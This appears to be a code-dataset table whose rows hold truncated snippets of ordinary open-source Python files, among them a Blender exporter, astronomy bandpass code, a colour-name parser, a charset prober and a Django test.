repo_name stringlengths 5-100 | path stringlengths 4-231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6-947k | score float64 0-0.34 | prefix stringlengths 0-8.16k | middle stringlengths 3-512 | suffix stringlengths 0-8.17k
---|---|---|---|---|---|---|---|---
pvint/Blender2MS3d | io_mesh_ms3d/export_ms3d.py | Python | gpl-2.0 | 11,954 | 0.03915 |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2004-2015: Paul Vint pjvint@gmail.com
"""
This script exports Milkshape3d text files from Blender (http://www.blender.org). It supports face and vertex normals,
colours, and texture coordinates per face or per vertex.
Only one mesh can be exported at a time.
"""
import bpy
import os
DEBUG = True
def getPrimaryVertexGroup(_vgroups, _v):
g = -1
w = 0
## Scan through any vertex groups and return the index of the one with the highest weight (or -1 if none)
for vertgroup in _v.groups:
if (vertgroup.weight > w):
w = vertgroup.weight
g = vertgroup.group
#fw("xx%fxx" % vertgroup.group)
return g
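# Worked example (hypothetical data): for a vertex belonging to groups with
# weights {group 0: 0.2, group 2: 0.8}, the loop above keeps group 2 (weight
# 0.8) and returns 2; a vertex with no group memberships returns -1.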
def face_iter_func(mesh):
uv_layer = mesh.uv_textures.active.data
uv_layer_len = len(uv_layer)
faces = mesh.faces
for i in range(uv_layer_len):
uv_elem = uv_layer[i]
yield (i, uv_layer[i].uv)
def save(operator,
context,
filepath="",
use_modifiers=True,
use_normals=True,
use_uv_coords=True,
use_colors=True,
):
def rvec3d(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
def rvec2d(v):
return round(v[0], 6), round(v[1], 6)
scene = context.scene
obj = context.active_object
if not obj:
raise Exception("Error, Select 1 active object")
# Multiple meshes
objects = context.selected_objects
file = open(filepath, "w", encoding="utf8", newline="\n")
fw = file.write
fw("// Milkshape 3D ASCII\n\n")
fw("Frames: 30\n")
fw("Frame: 1\n\n")
if scene.objects.active:
bpy.ops.object.mode_set(mode='OBJECT')
o = 0
numArmatures = 0
numMeshes = 0
# count the meshes
for obj in objects:
if obj.type == "MESH":
numMeshes = numMeshes + 1
fw("Meshes: %d\n" % numMeshes)
for obj in objects:
## Check if it's an armature
if obj.type == "ARMATURE":
numArmatures = numArmatures + 1
else:
if use_modifiers:
mesh = obj.to_mesh(scene, True, 'PREVIEW')
else:
mesh = obj.data
if not mesh:
raise Exception("Error, could not get mesh data from active object")
# mesh.transform(obj.matrix_world) # XXX
has_uv = (len(mesh.uv_textures) > 0)
has_uv_vertex = (len(mesh.sticky) > 0)
# FIXME
#has_uv = True
has_vcol = len(mesh.vertex_colors) > 0
#if (not has_uv) and (not has_uv_vertex):
# use_uv_coords = False
if not has_vcol:
use_colors = False
if not use_uv_coords:
has_uv = has_uv_vertex = False
if not use_colors:
has_vcol = False
if has_uv:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
use_uv_coords = False
has_uv = False
else:
active_uv_layer = active_uv_layer.data
if False: # Testing
for i, uv in face_iter_func(mesh):
fw("%d %f \n" % (i, uv[0][0]))
return True
## Get UV list
if has_uv:
faceUVs = []
for i, uv in face_iter_func(mesh):
faceUVs.append(uv)
if has_vcol:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
use_colors = False
has_vcol = False
else:
active_col_layer = active_col_layer.data
# in case
color = uvcoord = uvcoord_key = normal = normal_key = None
mesh_verts = mesh.vertices # save a lookup
ply_verts = [] # list of dictionaries
# vdict = {} # (index, normal, uv) -> new index
vdict = [{} for i in range(len(mesh_verts))]
ply_faces = [[] for f in range(len(mesh.faces))]
vert_count = 0
## Vertex Group Testing
vGroups = []
vGroupsIndices = []
if (obj.vertex_groups):
for x in obj.vertex_groups:
#fw("=%d %s\n" % (x.index, x.name))
vGroups.append({x.index, x.name})
vGroupsIndices.append(x.index)
## Yielded:
#0 Bone
#1 Bone.002
#2 Bone.001
for i, f in enumerate(mesh.faces):
# GOOD: fw("Verts: %d %d %d\n" % (f.vertices[0], f.vertices[1], f.vertices[2]))
smooth = f.use_smooth
if not smooth:
normal = tuple(f.normal)
normal_key = rvec3d(normal)
if has_uv:
uv = active_uv_layer[i]
uv = uv.uv1, uv.uv2, uv.uv3, uv.uv4 # XXX - crufty :/
if has_vcol:
col = active_col_layer[i]
col = col.color1[:], col.color2[:], col.color3[:], col.color4[:]
f_verts = f.vertices
pf = ply_faces[i]
## FIXME Deprecated
for j, vidx in enumerate(f_verts):
v = mesh_verts[vidx]
if smooth:
normal = tuple(v.normal)
normal_key = rvec3d(normal)
if has_uv:
uvcoord = uv[j][0], 1.0 - uv[j][1]
uvcoord_key = rvec2d(uvcoord)
elif has_uv_vertex:
uvcoord = v.uvco[0], 1.0 - v.uvco[1]
uvcoord_key = rvec2d(uvcoord)
if has_vcol:
color = col[j]
color = (int(color[0] * 255.0),
int(color[1] * 255.0),
int(color[2] * 255.0),
)
key = normal_key, uvcoord_key, color
vdict_local = vdict[vidx]
pf_vidx = vdict_local.get(key) # Will be None initially
if pf_vidx is None: # same as vdict_local.has_key(key)
pf_vidx = vdict_local[key] = vert_count
ply_verts.append((vidx, normal, uvcoord, color))
vert_count += 1
pf.append(pf_vidx)
# Mesh name, flags, material index
fw("\"%s\" 0 %d\n" % (obj.name, o))
#fw("%d\n" % (len(mesh.faces) * 3))
#if use_colors:
# fw("property uchar red\n"
# "property uchar green\n"
# "property uchar blue\n")
#fw("element face %d\n" % len(mesh.faces))
#fw("property list uchar uint vertex_indices\n")
#fw("end_header\n")
# mesh.vertices is array of vertex coords
# face.vertices is array of vertex indices
# to get unique vertices in the file create an array of all vertices and
# then find the highest index in the list of faces and use only up to
# that one to only have unique vertices
maxIndex = 0
numVerts = 0
for f in mesh.faces:
for v in f.vertices:
numVerts = numVerts + 1
if (v >= maxIndex):
maxIndex = v
maxIndex = maxIndex + 1
#fw("%d\n" % (maxIndex))
## create array of verts
vco = []
fverts = []
## make a properly ordered list of vertices
for f in mesh.faces:
for v in mesh.vertices:
fverts.append(v)
### The following method is crap - need to duplicate verts for when they have different
### UV coords for different faces!
#for i in range(0, maxIndex):
#fw("0 %.4f %.4f %.4f " % (-fverts[i].co[0], fverts[i].co[2], -fverts[i].co[1]))
#fw('0.0, 0.0') # uv
# Vertex Group
#vg = getPrimaryVertexGroup(vGroups, fverts[i])
#fw(" %d\n" % vg)
## Prep for UVs
activeUV = mesh.uv_textures[0].data
#if has_uv:
# activeUV = mesh.uv_textures
### Dump each vert on each face
fw("%d\n" % numVerts)
fIdx = 0
for f in mesh.faces:
if (len(f.vertices) != 3):
raise Exception("Error! All faces must be triangles. (Convert in edit mode by pressing CTRL-t)")
## Loop through each vertex in the face
vIdx = 0
uv = activeUV[fIdx]
fuv = uv.uv1, uv.uv2, uv.uv3
for v in f.vertices:
fw("0 %.4f %.4f %.4f " % (-fverts[v].co[0], fverts[v].co[2], -fverts[v].co[1]))
## uv coords
#for i, uv in face_iter_func(mesh):
#fw("%d %f \n" % (i, uv[0][0]))
if has_uv:
fw("%.4f %.4f " % (faceUVs[fIdx][vIdx][0], 1.0 - faceUVs[fIdx][vIdx][1]))
#fw("%.4f %.4f " % (fverts[v].uv[0], 1 - fverts[v].uv[1]))
else:
fw("0.0000 0.0000 ");
## Vertex Group
if not obj.vertex_groups:
vg = -1
sncosmo/sncosmo | sncosmo/bandpasses.py | Python | bsd-3-clause | 16,460 | 0 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import astropy.units as u
import numpy as np
from astropy.io import ascii
from astropy.utils import lazyproperty
from scipy.interpolate import splev, splrep
from ._registry import Registry
from .constants import HC_ERG_AA, SPECTRUM_BANDFLUX_SPACING
from .utils import integration_grid
__all__ = ['get_bandpass', 'read_bandpass', 'Bandpass', 'AggregateBandpass',
'BandpassInterpolator']
_BANDPASSES = Registry()
_BANDPASS_INTERPOLATORS = Registry()
def get_bandpass(name, *args):
"""Get a Bandpass from the registry by name."""
if isinstance(name, Bandpass):
return name
if len(args) == 0:
return _BANDPASSES.retrieve(name)
else:
interp = _BANDPASS_INTERPOLATORS.retrieve(name)
return interp.at(*args)
def read_bandpass(fname, fmt='ascii', wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled,
normalize=False, trim_level=None, name=None):
"""Read bandpass from two-column ASCII file containing wavelength and
transmission in each line.
Parameters
----------
fname : str
File name.
fmt : {'ascii'}
File format of file. Currently only ASCII file supported.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set to True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
name : str, optional
Identifier. Default is `None`.
Returns
-------
band : `~sncosmo.Bandpass`
"""
if fmt != 'ascii':
raise ValueError("format {0} not supported. Supported formats: 'ascii'"
.format(fmt))
t = ascii.read(fname, names=['wave', 'trans'])
return Bandpass(t['wave'], t['trans'], wave_unit=wave_unit,
trans_unit=trans_unit, normalize=normalize,
trim_level=trim_level, name=name)
def slice_exclude_below(a, minvalue, grow=1):
"""Contiguous range in 1-d array `a` that excludes values less than
`minvalue`. Range is expanded by `grow` in each direction."""
idx = np.flatnonzero(a >= minvalue)
i0 = max(idx[0] - grow, 0)
i1 = min(idx[-1] + 1 + grow, len(a)) # exclusive
return slice(i0, i1)
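# Worked example (values chosen for illustration): for
# a = np.array([0., 0., 1., 5., 1., 0.]), minvalue=1.0 and grow=1,
# np.flatnonzero(a >= 1.0) gives indices [2, 3, 4], so i0 = 1, i1 = 6 and the
# function returns slice(1, 6), keeping one extra element on each side.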
class Bandpass(object):
"""Transmission as a function of spectral wavelength.
Parameters
----------
wave : list_like
Wavelength. Monotonically increasing values.
trans : list_like
Transmission fraction.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set normalize=True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
trim_level : float, optional
If given, crop bandpass to region where transmission is above this
fraction of the maximum transmission. For example, if maximum
transmission is 0.5, ``trim_level=0.001`` will remove regions where
transmission is below 0.0005. Only contiguous regions on the sides
of the bandpass are removed.
name : str, optional
Identifier. Default is `None`.
Examples
--------
Construct a Bandpass and access the input arrays:
>>> b = Bandpass([4000., 4200., 4400.], [0.5, 1.0, 0.5])
>>> b.wave
array([ 4000., 4200., 4400.])
>>> b.trans
array([ 0.5, 1. , 0.5])
Bandpasses act like continuous 1-d functions (linear interpolation is
used):
>>> b([4100., 4300.])
array([ 0.75, 0.75])
The effective (transmission-weighted) wavelength is a property:
>>> b.wave_eff
4200.0
The ``trim_level`` keyword can be used to remove "out-of-band"
transmission upon construction. The following example removes regions of
the bandpass with transmission less than 1 percent of peak:
>>> band = Bandpass([4000., 4100., 4200., 4300., 4400., 4500.],
... [0.001, 0.002, 0.5, 0.6, 0.003, 0.001],
... trim_level=0.01)
>>> band.wave
array([ 4100., 4200., 4300., 4400.])
>>> band.trans
array([ 0.002, 0.5 , 0.6 , 0.003])
While less strictly correct than including the "out-of-band" transmission,
only considering the region of the bandpass where transmission is
significant can improve model-bandpass overlap as well as performance.
"""
def __init__(self, wave, trans, wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled, normalize=False,
name=None, trim_level=None):
wave = np.asarray(wave, dtype=np.float64)
trans = np.asarray(trans, dtype=np.float64)
if wave.shape != trans.shape:
raise ValueError('shape of wave and trans must match')
if wave.ndim != 1:
raise ValueError('only 1-d arrays supported')
# Ensure that units are actually units and not quantities, so that
# `to` method returns a float and not a Quantity.
wave_unit = u.Unit(wave_unit)
trans_unit = u.Unit(trans_unit)
if wave_unit != u.AA:
wave = wave_unit.to(u.AA, wave, u.spectral())
# If transmission is in units of inverse energy, convert to
# unitless transmission:
#
# (transmitted photons / incident photons) =
# (photon energy) * (transmitted photons / incident energy)
#
# where photon energy = h * c / lambda
if trans_unit != u.dimensionless_unscaled:
trans = (HC_ERG_AA / wave) * trans_unit.to(u.erg**-1, trans)
# Check that values are monotonically increasing.
# We could sort them, but if this happens, it is more likely a user
# error or faulty bandpass definition. So we leave it to the user to
# sort them.
if not np.all(np.ediff1d(wave) > 0.):
raise ValueError('bandpass wavelength values must be monotonically'
' increasing when supplied in wavelength or '
'decreasing when supplied in energy/frequency.')
if normalize:
trans /= np.max(trans)
# Trim "out-of-band" transmission
if trim_level is not None:
s = slice_exclude_below(trans, np.max(trans) * trim_level, grow=1)
wave = wave[s]
trans = trans[s]
# if more than one leading or trailing transmissions are zero, we
# can remove them.
if ((trans[0] == 0.0 and trans[1] == 0.0) or (trans[-1] == 0.0 and
trans[-2] == 0.0)):
i = 0
while i < len(trans) and trans[i] == 0.0:
i += 1
if i == len(trans):
raise ValueError('all zero transmission')
j = len(trans) - 1
while j >= 0 and tran
davidh-ssec/pyfbf | pyfbf/slicer.py | Python | gpl-3.0 | 3,928 | 0.003564 |
#!/usr/bin/env python
from . import memfbf
from numpy import append
import os
import logging
from glob import glob
LOG = logging.getLogger(__name__)
class SlicerFrame(dict):
pass
class FBFSlicer(object):
"""Given a workspace directory of flat binary files, grab all useful filenames and return a record of data at a
time as a python dictionary.
"""
def __init__(self, work_dir, buffer_size=0, filename_filter=None):
"""Initialize slicer object parameters.
:param work_dir: Workspace directory of flat binary files to read
:param buffer_size: Circular buffer size or 0 for non-circular buffers/FBFs
:param filename_filter: Filter function that returns True if the provided file should be opened for reading.
Should return False otherwise.
"""
self._wd = work_dir
self._buffer_size = buffer_size
self._open_files = dict()
if filename_filter is None:
filename_filter = lambda filename: True
self.should_include = filename_filter
def _update_open_files(self):
for fn in glob(os.path.join(self._wd, '*')):
if fn not in self._open_files and self.should_include(os.path.split(fn)[-1]):
LOG.debug('opening %s' % fn)
try:
nfo = memfbf.FBF(fn)
except Exception as oops:
nfo = None
LOG.info('%s could not be opened as FBF' % fn)
LOG.debug(repr(oops))
LOG.debug('found new file %s' % fn)
self._open_files[fn] = nfo
def __call__(self, first_record, last_record=None):
"""Retrieve a slice of a FBF directory using inclusive 1-based record number range, noting
that last-first+1 records are returned.
"""
last_record = first_record if last_record is None else last_record
if not self._open_files:
self._update_open_files()
data = SlicerFrame()
for name, nfo in self._open_files.items():
if nfo is not None:
# note we use % in order to deal with
# wavenumber files that are only ever 1 record long
# circular buffers which are fixed length files
file_len = nfo.length()
# check for non-circular buffer case and going off the end of the file
# note use of > since record numbers are 1-based
if (self._buffer_size == 0) and (file_len != 1) and (first_record > file_len or last_record > file_len):
LOG.warning('%s: length is %d but start-end is %d-%d' % (name, file_len, first_record, last_record))
return None
# check for circular buffers that aren't preallocated properly
if self._buffer_size > 0 and file_len not in (1, self._buffer_size):
LOG.info('buffer file %s size mismatch (%d != %d)! ignoring' % (name, file_len, self._buffer_size))
else:
# 0-based circular buffer
first_index = (first_record - 1) % file_len
last_index = (last_record - 1) % file_len
if last_index >= first_index:
# Records are in one continuous line
idx = slice(first_index, last_index + 1) # +1 to include last item
data[nfo.stemname] = nfo[idx]
else:
# Records are on two ends of the circular buffer
idx1 = slice(first_index, self._buffer_size)
idx2 = slice(0, last_index + 1) # +1 to include last item
arr1 = nfo[idx1]
arr2 = nfo[idx2]
data[nfo.stemname] = append(arr1, arr2, axis=0)
return data
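# Minimal sketch of the wrap-around index math above, using a plain list in
# place of an FBF file (buffer_size=5 and the record values are assumed for
# illustration):
#
#   buf = [10, 20, 30, 40, 50]        # circular buffer of 5 records
#   first_record, last_record = 5, 7  # 1-based range that wraps past the end
#   first_index = (5 - 1) % 5         # -> 4
#   last_index = (7 - 1) % 5          # -> 1
#   # last_index < first_index, so two slices are concatenated:
#   buf[4:5] + buf[0:2]               # -> [50, 10, 20]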
tannerbohn/ScholarVR | Code/fileIO.py | Python | gpl-2.0 | 368 | 0.05163 |
import json
def jsonSave(data, fileName, indent=True, sort=False, oneLine=False):
f = open(fileName, 'w')
if indent:
f.write(json.dumps(data, indent=4, sort_keys=sort))
else:
f.write(json.dumps(data, sort_keys=sort))
f.close()
def jsonLoad(fileName):
try:
file = open(fileName)
t=file.read()
file.close()
return json.loads(t)
except:
return {}
Amechi101/concepteur-market-app | venv/lib/python2.7/site-packages/PIL/ImageColor.py | Python | mit | 8,085 | 0.007421 |
#
# The Python Imaging Library
# $Id$
#
# map CSS3-style colour description strings to RGB
#
# History:
# 2002-10-24 fl Added support for CSS-style color strings
# 2002-12-15 fl Added RGBA support
# 2004-03-27 fl Fixed remaining int() problems for Python 1.5.2
# 2004-07-19 fl Fixed gray/grey spelling issues
# 2009-03-05 fl Fixed rounding error in grayscale calculation
#
# Copyright (c) 2002-2004 by Secret Labs AB
# Copyright (c) 2002-2004 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
import re
##
# Convert color string to RGB tuple.
#
# @param color A CSS3-style colour string.
# @return An RGB-tuple.
# @exception ValueError If the color string could not be interpreted
# as an RGB value.
def getrgb(color):
"""
Convert a color string to an RGB tuple. If the string cannot be parsed,
this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
try:
rgb = colormap[color]
except KeyError:
try:
# fall back on case-insensitive lookup
rgb = colormap[color.lower()]
except KeyError:
rgb = None
# found color in cache
if rgb:
if isinstance(rgb, tuple):
return rgb
colormap[color] = rgb = getrgb(rgb)
return rgb
# check for known string formats
m = re.match("#\w\w\w$", color)
if m:
return (
int(color[1]*2, 16),
int(color[2]*2, 16),
int(color[3]*2, 16)
)
m = re.match("#\w\w\w\w\w\w$", color)
if m:
return (
int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16)
)
m = re.match("rgb\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3))
)
m = re.match("rgb\(\s*(\d+)%\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
return (
int((int(m.group(1)) * 255) / 100.0 + 0.5),
int((int(m.group(2)) * 255) / 100.0 + 0.5),
int((int(m.group(3)) * 255) / 100.0 + 0.5)
)
m = re.match("hsl\(\s*(\d+)\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
from colorsys import hls_to_rgb
rgb = hls_to_rgb(
float(m.group(1)) / 360.0,
float(m.group(3)) / 100.0,
float(m.group(2)) / 100.0,
)
return (
int(rgb[0] * 255 + 0.5),
int(rgb[1] * 255 + 0.5),
int(rgb[2] * 255 + 0.5)
)
m = re.match("rgba\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3)),
int(m.group(4))
)
raise ValueError("unknown color specifier: %r" % color)
def getcolor(color, mode):
"""
Same as :py:func:`~PIL.ImageColor.getrgb`, but converts the RGB value to a
greyscale value if the mode is not color or a palette image. If the string
cannot be parsed, this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
# same as getrgb, but converts the result to the given mode
color = getrgb(color)
if mode == "RGB":
return color
if mode == "RGBA":
if len(color) == 3:
color = (color + (255,))
r, g, b, a = color
return r, g, b, a
if Image.getmodebase(mode) == "L":
r, g, b = color
return (r*299 + g*587 + b*114)//1000
return color
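# Worked example of the luma conversion above: getcolor("white", "L") resolves
# "white" to (255, 255, 255) and returns (255*299 + 255*587 + 255*114)//1000,
# which is 255; (128, 128, 128) likewise maps to 128, since the weights
# 299 + 587 + 114 sum to 1000.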
colormap = {
# X11 colour table (from "CSS3 module: Color working draft"), with
# gray/grey spelling issues fixed. This is a superset of HTML 4.0
# colour names used in CSS 1.
"aliceblue": "#f0f8ff",
"antiquewhite": "#faebd7",
"aqua": "#00ffff",
"aquamarine": "#7fffd4",
"azure": "#f0ffff",
"beige": "#f5f5dc",
"bisque": "#ffe4c4",
"black": "#000000",
"blanchedalmond": "#ffebcd",
"blue": "#0000ff",
"blueviolet": "#8a2be2",
"brown": "#a52a2a",
"burlywood": "#deb887",
"cadetblue": "#5f9ea0",
"chartreuse": "#7fff00",
"chocolate": "#d2691e",
"coral": "#ff7f50",
"cornflowerblue": "#6495ed",
"cornsilk": "#fff8dc",
"crimson": "#dc143c",
"cyan": "#00ffff",
"darkblue": "#00008b",
"darkcyan": "#008b8b",
"darkgoldenrod": "#b8860b",
"darkgray": "#a9a9a9",
"darkgrey": "#a9a9a9",
"darkgreen": "#006400",
"darkkhaki": "#bdb76b",
"darkmagenta": "#8b008b",
"darkolivegreen": "#556b2f",
"darkorange": "#ff8c00",
"darkorchid": "#9932cc",
"darkred": "#8b0000",
"darksalmon": "#e9967a",
"darkseagreen": "#8fbc8f",
"darkslateblue": "#483d8b",
"darkslategray": "#2f4f4f",
"darkslategrey": "#2f4f4f",
"darkturquoise": "#00ced1",
"darkviolet": "#9400d3",
"deeppink": "#ff1493",
"deepskyblue": "#00bfff",
"dimgray": "#696969",
"dimgrey": "#696969",
"dodgerblue": "#1e90ff",
"firebrick": "#b22222",
"floralwhite": "#fffaf0",
"forestgreen": "#228b22",
"fuchsia": "#ff00ff",
"gainsboro": "#dcdcdc",
"ghostwhite": "#f8f8ff",
"gold": "#ffd700",
"goldenrod": "#daa520",
"gray": "#808080",
"grey": "#808080",
"green": "#008000",
"greenyellow": "#adff2f",
"honeydew": "#f0fff0",
"hotpink": "#ff69b4",
"indianred": "#cd5c5c",
"indigo": "#4b0082",
"ivory": "#fffff0",
"khaki": "#f0e68c",
"lavender": "#e6e6fa",
"lavenderblush": "#fff0f5",
"lawngreen": "#7cfc00",
"lemonchiffon": "#fffacd",
"lightblue": "#add8e6",
"lightcoral": "#f08080",
"lightcyan": "#e0ffff",
"lightgoldenrodyellow": "#fafad2",
"lightgreen": "#90ee90",
"lightgray": "#d3d3d3",
"lightgrey": "#d3d3d3",
"lightpink": "#ffb6c1",
"lightsalmon": "#ffa07a",
"lightseagreen": "#20b2aa",
"lightskyblue": "#87cefa",
"lightslategray": "#778899",
"lightslategrey": "#778899",
"lightsteelblue": "#b0c4de",
"lightyellow": "#ffffe0",
"lime": "#00ff00",
"limegreen": "#32cd32",
"linen": "#faf0e6",
"magenta": "#ff00ff",
"maroon": "#800000",
"mediumaquamarine": "#66cdaa",
"mediumblue": "#0000cd",
"mediumorchid": "#ba55d3",
"mediumpurple": "#9370db",
"mediumseagreen": "#3cb371",
"mediumslateblue": "#7b68ee",
"mediumspringgreen": "#00fa9a",
"mediumturquoise": "#48d1cc",
"mediumvioletred": "#c71585",
"midnightblue": "#191970",
"mintcream": "#f5fffa",
"mistyrose": "#ffe4e1",
"moccasin": "#ffe4b5",
"navajowhite": "#ffdead",
"navy": "#000080",
"oldlace": "#fdf5e6",
"olive": "#808000",
"olivedrab": "#6b8e23",
"orange": "#ffa500",
"orangered": "#ff4500",
"orchid": "#da70d6",
"palegoldenrod": "#eee8aa",
"palegreen": "#98fb98",
"paleturquoise": "#afeeee",
"palevioletred": "#db7093",
"papayawhip": "#ffefd5",
"peachpuff": "#ffdab9",
"peru": "#cd853f",
"pink": "#ffc0cb",
"plum": "#dda0dd",
"powderblue": "#b0e0e6",
"purple": "#800080",
"red": "#ff0000",
"rosybrown": "#bc8f8f",
"royalblue": "#4169e1",
"saddlebrown": "#8b4513",
"salmon": "#fa8072",
"sandybrown": "#f4a460",
"seagreen": "#2e8b57",
"seashell": "#fff5ee",
"sienna": "#a0522d",
"silver": "#c0c0c0",
"skyblue": "#87ceeb",
"slateblue": "#6a5acd",
"slategray": "#708090",
"slategrey": "#708090",
"snow": "#fffafa",
"springgreen": "#00ff7f",
"steelblue": "#4682b4",
"tan": "#d2b48c",
"teal": "#008080",
"thistle": "#d8bfd8",
"tomato": "#ff6347",
"turquoise": "#40e0d0",
"violet": "#ee82ee",
"wheat": "#f5deb3",
"white": "#ffffff",
"whitesmoke": "#f5f5f5",
"yellow": "#ffff00",
"yellowgreen": "#9acd32",
}
codecakes/algorithms_monk | implementation/lisa_workbook_array_single_iter.py | Python | mit | 2,037 | 0.003939 |
#!/bin/python
"""
Lisa just got a new math workbook. A workbook contains exercise problems, grouped into chapters.
There are n chapters in Lisa's workbook, numbered from 1 to n.
The i-th chapter has t_i problems, numbered from 1 to t_i.
Each page can hold up to k problems. There are no empty pages or unnecessary spaces, so only the last page of a chapter may contain fewer than k problems.
Each new chapter starts on a new page, so a page will never contain problems from more than one chapter.
The page number indexing starts at 1.
Lisa believes a problem to be special if its index (within a chapter) is the same as the page number where it's located. Given the details for Lisa's workbook, can you count its number of special problems?
Note: See the diagram in the Explanation section for more details.
Input Format
The first line contains two integers n and k, the number of chapters and the maximum number of problems per page respectively.
The second line contains n integers t_1, t_2, ..., t_n, where t_i denotes the number of problems in the i-th chapter.
Constraints
1 <= n, k, t_i <= 100
Output Format
Print the number of special problems in Lisa's workbook.
Sample Input
5 3
4 2 6 1 10
Sample Output
4
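Explanation of the sample (k=3): chapter 1 (4 problems) fills page 1 with
problems 1-3 and page 2 with problem 4, so problem 1 on page 1 is special;
chapter 2 (2 problems) sits on page 3 with no match; chapter 3 (6 problems)
fills pages 4-5, and problem 5 lands on page 5; chapter 4 (1 problem) sits on
page 6 with no match; chapter 5 (10 problems) fills pages 7-10, and problems
9 (page 9) and 10 (page 10) match. Total: 4 special problems.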
"""
def spl_question(arr, n, k):
prev_accum = cumm = tot_pg_num = ques = count = 0
for each_chptr in arr:
# O(N)
pgs, rem = divmod(each_chptr, k)
ques = prev_accum = cumm = 0
for pg in xrange(pgs):
tot_pg_num += 1
ques += k
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
prev_accum = cumm
if rem:
tot_pg_num += 1
ques += rem
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
return count
if __name__ == "__main__":
n, k = raw_input().strip("\n").split()
n, k = int(n), int(k)
arr = map(int, raw_input().strip("\n").split())
print spl_question(arr, n, k)
archifix/settings | sublime/Packages/SublimeCodeIntel/libs/chardet/utf8prober.py | Python | mit | 2,680 | 0.001866 |
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .constants import eStart, eError, eItsMe
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == eError:
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
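# Worked numbers for the estimate above: after 3 multi-byte sequences the
# confidence is 1.0 - 0.99 * 0.5**3 = 0.87625; from 6 sequences onward the
# else branch returns a flat 0.99.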
novafloss/django-north | tests/test_showmigrations_command.py | Python | mit | 2,400 | 0 |
from django.core.management import call_command
import pytest
import septentrion
def test_showmigrations_command_override(mocker):
mock_django_handle = mocker.patch(
'django.core.management.commands.showmigrations.Command.handle')
mock_show_migrations = mocker.patch(
'septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock_django_handle.called is False
assert mock_show_migrations.called is True
